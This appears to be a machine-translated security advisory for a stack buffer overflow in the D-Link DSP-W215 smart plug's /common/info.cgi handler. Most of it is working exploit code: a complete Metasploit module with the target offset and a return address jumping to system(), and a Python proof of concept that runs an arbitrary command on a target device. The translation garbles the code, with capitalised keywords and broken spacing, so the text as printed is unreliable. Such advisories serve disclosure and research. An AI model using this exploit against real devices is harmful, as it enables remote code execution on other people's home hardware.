D-Link DSP-W215 '/common/info. cgi' handle program Stack Buffer Overflow Vulnerability

D-Link DSP-W215 '/common/info. cgi' handle program Stack Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
D-Link DSP-W215
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68521
 
D-Link DSP-W215 tracks household energy usage and manages smart Sockets for household appliances.
 
D-Link DSP-W215 processing is sent to/common/info. the my_cgi.cgi component has the stack buffer overflow vulnerability when the cgi processing program sends a specially crafted post http request address, which can cause malicious users to execute arbitrary code in the context of the affected device.
 
<* Source: Craig Heffner
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
##
# This module requires Metasploit: http // metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
Require 'msf/core'
 
Class Metasploit3 <Msf: Exploit: Remote
Rank = NormalRanking
 
Include Msf: Exploit: Remote: HttpClient
Include Msf: Exploit: CmdStager
 
Def initialize (info = {})
Super (update_info (info,
'Name' => 'd-Link info. cgi POST Request Buffer overflow ',
'Description' => % q {
This module exploits an anonymous remote code execution vulnerability on different D-Link
Devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
When handling specially crafted post http requests addresses to the/common/info. cgi
Handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
Environment.
},
'Author' =>
[
'Craig Heffner ', # vulnerability discovery and initial PoC
'Michael Messner <devnull [at] s3cur1ty.de> ', # Metasploit module
],
'License '=> MSF_LICENSE,
'Platform' => 'linux ',
'Arch '=> ARCH_MIPSBE,
'References '=>
[
['Ossvdb', '123'],
['Url', 'HTTP: // www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
['Ic IC targeting', {'auto' => true}],
['D-Link DSP-W215-v1.02 ',
{
'Offset' => 477472,
'Ret '=> 0x405cec # jump to system-my_cgi.cgi
}
]
],
'Disclosuredate' => 'may 22 2014 ',
'Defaulttarget' => 0 ))
 
Deregister_options ('deststager: DECODER ', 'deststager: flavor ')
End
 
Def check
Begin
Res = send_request_cgi ({
'Url' => "/common/info. cgi ",
'Method' => 'get'
})
 
If res & [200,301,302]. include? (Res. code)
If res. body = ~ /DSP-W215A1/& res. body = ~ /1.02/
@ My_target = targets [1] if target ['auto']
Return Exploit: CheckCode: Appears
End
 
Return Exploit: CheckCode: Detected
End
 
Rescue: Rex: ConnectionError
Return Exploit: CheckCode: Safe
End
 
Exploit: CheckCode: Unknown
End
 
Def exploit
Print_status ("# {peer}-Trying to access the vulnerable URL ...")
 
@ My_target = target
Check_code = check
 
Unless check_code = Exploit: CheckCode: Detected | check_code = Exploit: CheckCode: Appears
Fail_with (Failure: NoTarget, "# {peer}-Failed to access the vulnerable URL ")
End
 
If @ my_target.nil? | @ My_target ['auto']
Fail_with (Failure: NoTarget, "# {peer}-Failed to auto detect, try setting a manual target ...")
End
 
Print_status ("# {peer}-Exploiting # {@ my_target.name }...")
Execute_cmdstager (
: Flavor =>: echo,
: Linemax = & gt; 185
)
End
 
Def prepare_shellcode (cmd)
Buf = rand_text_alpha_upper (@ my_target ['offset']) # Stack filler
Buf <[@ my_target.ret]. pack ("N") # Overwrite $ ra-> jump to system
 
# La $ t9, system
# La $ s1, 0x440000
# Jalr $ t9; system
# Addiu $ a0, $ sp, 0x28 # our command
 
Buf <rand_text_alpha_upper (40) # Command to execute must be at $ sp + 0x28
Buf <cmd # Command to execute
Buf <"\ x00" # NULL terminate the command
End
 
Def execute_command (cmd, opts)
Shellcode = prepare_shellcode (cmd)
 
Begin
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "/common/info. cgi ",
'Encode _ params '=> false,
'Vars _ Post' => {
'Storage _ path' => shellcode,
}
}, 5)
Return res
Rescue: Rex: ConnectionError
Fail_with (Failure: Unreachable, "# {peer}-Failed to connect to the web server ")
End
End
End
 

#! /Usr/bin/env python

Import sys
Import urllib2

Try:
Target = sys. argv [1]
Command = sys. argv [2]
Except t:
Print "Usage: % s <target> <command>" % sys. argv [0]
Sys. exit (1)

Url = "http: // % s/common/info. cgi" % target

Buf = "storage_path =" # POST parameter name
Buf + = "D" * (0x74944-36) # Stack filler
Buf + = "\ x00 \ x40 \ x5C \ xEC" # Overwrite $ ra
Buf + = "E" * 0x28 # Command to execute must be at $ sp + 0x28
Buf + = command # Command to execute
Buf + = "\ x00" # NULL terminate the command

Req = urllib2.Request (url, buf)
Print urllib2.urlopen (req). read ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.dlink.com/us/en/home-solutions/connected-home/smart-plugs/dsp-w215

This article permanently updates the link address: